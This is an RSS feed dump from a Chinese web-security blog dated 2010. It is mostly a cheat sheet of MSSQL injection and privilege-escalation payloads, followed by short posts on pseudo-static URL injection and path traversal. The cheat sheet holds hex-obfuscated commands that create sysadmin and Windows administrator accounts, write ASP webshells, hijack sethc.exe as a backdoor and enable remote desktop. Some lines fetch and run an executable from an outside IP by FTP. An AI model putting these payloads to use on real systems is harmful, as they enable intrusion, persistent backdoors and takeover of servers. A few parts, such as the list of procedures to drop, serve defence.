暖月 http://www.nuanyue.com 专注WEB、Linux及数据库应用安全 Sun, 01 Aug 2010 01:52:44 +0000 en hourly 1 http://wordpress.org/?v=3.0.1 暖月-Web应用安全文集 http://www.nuanyue.com/%e6%9a%96%e6%9c%88-web%e5%ba%94%e7%94%a8%e5%ae%89%e5%85%a8%e6%96%87%e9%9b%86-2.html http://www.nuanyue.com/%e6%9a%96%e6%9c%88-web%e5%ba%94%e7%94%a8%e5%ae%89%e5%85%a8%e6%96%87%e9%9b%86-2.html#comments Fri, 30 Jul 2010 06:53:34 +0000 http://www.nuanyue.com/?p=1361 整理了一下博客里的部分文章,编辑了一下,方便阅读,看来记录下来的,才最真实。

下载:
暖月-Web应用安全文集

]]> 整理了一下博客里的部分文章,编辑了一下,方便阅读,看来记录下来的,才最真实。

下载:
暖月-Web应用安全文集

]]> http://www.nuanyue.com/%e6%9a%96%e6%9c%88-web%e5%ba%94%e7%94%a8%e5%ae%89%e5%85%a8%e6%96%87%e9%9b%86-2.html/feed 3 SQL高级注入使用之储存过程 http://www.nuanyue.com/sql%e9%ab%98%e7%ba%a7%e6%b3%a8%e5%85%a5%e4%bd%bf%e7%94%a8%e4%b9%8b%e5%82%a8%e5%ad%98%e8%bf%87%e7%a8%8b.html http://www.nuanyue.com/sql%e9%ab%98%e7%ba%a7%e6%b3%a8%e5%85%a5%e4%bd%bf%e7%94%a8%e4%b9%8b%e5%82%a8%e5%ad%98%e8%bf%87%e7%a8%8b.html#comments Wed, 14 Jul 2010 14:39:53 +0000 http://www.nuanyue.com/?p=1346 看到别人整理的相当不错,拷贝到博客里来了,里面有添加的几段。

sql2005恢复xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECON[......]

全文阅读

]]> 看到别人整理的相当不错,拷贝到博客里来了,里面有添加的几段。

sql2005恢复xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
---------------
-- 添加SA用户--
---------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master.dbo.sp_addlogin system;
2、exec master.dbo.sp_addlogin system,system;
3、exec master.dbo.sp_addsrvrolemember itpro,sysadmin
 
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
防注入 sa:itpro pass:itpro
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1
 
防注入 sa:system pass:system
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e2073797374656d2c73797374656d as varchar(4000));exec(@s);declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d626572202773797374656d272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1
一、
--------------
-恢复存储过程-
--------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
恢复cmdshell防注入
============================================================
declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;
exec @a @b,@c
============================================================
 
二、
 
----------------------------------
--恢复sp_addextendedproc存储过程--
----------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
三、
--------------------------
--使用存储过程加管理方法--
--------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、master.dbo.xp_cmdshell 'net user itpro gmasfm && net localgroup administrators itpro /add'
2、EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrators admina /add&dir "e:\asp', '1.asp'
3、DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
四、
-------------------------
-- 导出文件的存储过程  --
-------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
五、
---------------------------
--  读取文件的存储过程http://www.nuanyue.com-----------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&declare">www.nuanyue.com--
---------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\1.txt', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
六、
 
----------------------
-----写一句话木马http://www.nuanyue.com---------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&declare">www.nuanyue.com-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'< %execute(request("a"))%>'     ' ' 单引号为要写的内容
< %25 if request("x")<>"" then execute(request("x"))%25>
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
防注入写入法
================================================================
declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
set @c=0x6D61737465722E2E73705F6F61637265617465;
set @d=0x6D61737465722E2E73705F6F616D6574686F64;
set @e=0x536372697074696E672E46696C6573797374656D4F626A656374;
set @f=0x4372656174655465787446696C65;
set @g=0x433A5C496E65747075625C73797374656D2E617370;
set @h=0x74727565;
set @i=0x7772697465;
set @j=0x3C256576616C20726571756573742822582229253E;
exec @c @e,@a output;
exec @d @a,@f,@b output,@g,@h;
exec @d @b,@i,null,@j
==================================================================
 
七、
----------------------
-----写一句话木马http://www.nuanyue.com---------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdeclare">www.nuanyue.com-----
----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;-- and% 1=1
在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds \bake.asp,'%20select%20''< %25execute(request("a"))%25>''%20';--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
八、
----------------------
---SA沙盒模式提权-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
 
2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 
九、
--------------------
-----另类SA提权-----
--------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2、declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
1、declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
 
DECLARE @o int
DECLARE @z int
EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty  @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
十、
--------------
--导出注册表--
--------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--
 
2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'
 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
十一、
 
----------------
---下载程序http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1">www.nuanyue.com-----
----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[http://192.168.1.6:800/wwwroot.rar],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.exe],1 ;-- and 1=1
 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
十二、
 
-----------------
-Log备份WebShellhttp://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com-
-----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
alter database master set RECOVERY FULL
create table cmd (a image)--
backup log master to disk = 'c:\cmd' with init
insert into cmd (a) values ('< %eval(request("a")):response.end%>')--
backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'--
drop table cmd--
2\

use mir
alter database mir set RECOVERY FULL --
create table cmd8 (a image)--
backup log mir to disk = 'c:\cmd8' with init --
insert into cmd8 (a) values ('< %eval(request("a")):response.end%>')--
backup log mir to disk = 'c:\backup.asp'--
drop table cmd8--
alter database mir set RECOVERY SIMPLE --
3\
create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--
declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--
insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)--
select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
Drop/**/table/**/[shit_tmp]--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
十三、
-------------------------------
--创建sp_readtextfile存储过程http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com--
-------------------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @filename sysname
as
 
  begin
  set nocount on
  Create table #tempfile (line varchar(8000))
  exec ('bulk insert #tempfile from "' + @filename + '"')
  select * from #tempfile
  drop table #tempfile
End
go
 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
十四、开3389http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com
===================================================================
declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @b
===================================================================
 
我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml
-----------------
---读取文件内容--
-----------------
exec sp_readTextFile 'c:\boot.ini'
 
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
 
-----------------------
---清除MsSql日志http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com-------
-----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
----------------------
--停掉或激活某个服务--
----------------------
exec master..xp_servicecontrol 'stop','sharedaccess'
exec master..xp_servicecontrol 'start','sharedaccess'
 
--------------------
--列出驱动器的名称http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com--
--------------------
 
EXEC [master].[dbo].[xp_availablemedia]
 
----------------------------------
--列出指定目录的所有下一级子目录--
----------------------------------
 
EXEC [master].[dbo].[xp_subdirs] 'c:\windows'
 
------------------------------
--列出当前错误日志的具体内容--
------------------------------
 
EXEC [master].[dbo].[xp_readerrorlog]
 
----------------------
--列出当前计算机名称--
----------------------
 
execute master..xp_getnetname
 
--------------------------------
-列出当前计算机的驱动器可用空间-
--------------------------------
 
execute master..xp_fixeddrives
 
========================
==列出服务器所有本地组==
========================
 
execute master..xp_enumgroups
 
======================
==获取MS SQL的版本号==
======================
 
execute master..sp_msgetversion
 
=========================================
==参数说明:目录名,目录深度,是否显示文件==
=========================================
 
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
 
=========================================
==列出服务器上安装的所有OLEDB提供的程序==
=========================================
 
execute master..xp_enum_oledb_providers
 
=========================
==列出服务器上配置的DNS==
=========================
 
execute master..xp_enumdsn
 
删除存储过程
 
drop PROCEDURE sp_addextendedproc
 
-----------------------
--删除sql危险存储过程--
-----------------------
 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xp_cmdshell新的恢复办法
 
扩展储存过程被删除以后可以有很简单的办法恢复:
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
 
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
 
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
 
-----------------------------
 
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
 
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
 
开启cmdshell的sql语句
 
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
 
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
 
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
 
否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
 
堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell
 
读3389端口
regedit /e port.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
然后 type port.reg | find "PortNumber"
sql 语句
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); --
 
开启2003的终端(sa)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections','REG_DWORD','0'
 
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
 
映象劫持http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';-- 
 
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';-- 
 
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f
 
建立用户1-这里默认用户是Reconditeness密码9527可自行修改
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")')
 
win2K直接上PS马
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
 
win03-XP直接上PS马
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
 
.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user dell huxifeng007 /add'
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators dell /add'
 
xp或2003server系统:
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user dell huxifeng007 /add'
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators dell /add'
]]> http://www.nuanyue.com/sql%e9%ab%98%e7%ba%a7%e6%b3%a8%e5%85%a5%e4%bd%bf%e7%94%a8%e4%b9%8b%e5%82%a8%e5%ad%98%e8%bf%87%e7%a8%8b.html/feed 0 伪静态注入技术 http://www.nuanyue.com/%e4%bc%aa%e9%9d%99%e6%80%81%e6%b3%a8%e5%85%a5%e6%8a%80%e6%9c%af.html http://www.nuanyue.com/%e4%bc%aa%e9%9d%99%e6%80%81%e6%b3%a8%e5%85%a5%e6%8a%80%e6%9c%af.html#comments Mon, 07 Jun 2010 05:05:29 +0000 http://www.nuanyue.com/?p=1314 文/似曾相识

常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html,在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多,也很简单这里就不说了。

例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.co[......]

全文阅读

]]> 文/似曾相识

常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html,在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多,也很简单这里就不说了。

例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play&name=Diablo 的形式,当然这部分是PHP执行的所以在访问时看不到。

假如name=Diablo这个参数有注入点但是访问的是伪静态页面,那么注入的语句其实差不多,不过如果是MYSQL数据库是不能用注释符的,因为注释的斜杠会被当成目录访问,那么就会出现问题,所以这里的注入需要把语句补全。

注入点检测可以用:http://www.XXX.com/play/Diablo’ and 1=’1.html与http://www.XXX.com/play/Diablo’ and 1=’2.html来判断,联合查询我也试过,不过失败了。

我用的语句如下:http://www.XXX.com/play/diablo’ and 1=2 union select 1,2… from information_schema.columns where 1=’1.html,但是测试了N次都不能成功,有可能程序的SQL语句后面还有其他条件,具体原因没仔细看。

所以这个时候只能用盲注来检测,不过因为伪静态注入的URL比较特殊,一般的注入工具是利用不了的,所以就把刺猬写的COOKIES注入中转器的 get方式注入的代码修改了一下,只要把注入的参数写成Diablo ,然后在提交的语句后面加上.html那么就可以直接放到穿山甲里注入了。

注入的速度就看中转的速度了,感觉用低版本的穿山甲效果更好,高版本有可能因为速度比较快所以在猜解字母的时候会导致部分内容检测不到。
以上是我在伪静态注入时的一些方法,也许有些地方写的不正确还请各位大牛指出,我不会写程序,最多只能修改代码,所以如果有大牛可以写一款伪静态注入的工具那么感激不尽!

]]> http://www.nuanyue.com/%e4%bc%aa%e9%9d%99%e6%80%81%e6%b3%a8%e5%85%a5%e6%8a%80%e6%9c%af.html/feed 6 浅析路径遍历漏洞 http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86%e6%bc%8f%e6%b4%9e.html http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86%e6%bc%8f%e6%b4%9e.html#comments Sat, 29 May 2010 15:47:21 +0000 http://www.nuanyue.com/?p=1292 文/饭

许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名,形如:http://www.nuanyue.com/getfile=image.jgp

当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/i[......]

全文阅读

]]> 文/饭

许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名,形如:http://www.nuanyue.com/getfile=image.jgp

当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/images/image.jpg”,将读取的内容返回给访问者。

初看,在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“/..”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。

发现路径遍历漏洞

路径遍历漏洞的发现,主要是对Web应用程序的文件读取交互的功能块,进行检测,面对这样的读取方式:

“http://www.nuanyue.com/test/downfile.jsp?filename=fan.pdf”

我们可以使用 “../”来作试探,比如提交Url:“getfile=/fan/fan/*53.pdf”,而系统在解析是“d://site/test/pdf/fan/fan/../../*53.pdf”,通过“../”跳转目录“/fan”,即“d://site/test/pdf/*53.pdf”,返回了读取文件的正常的页面。

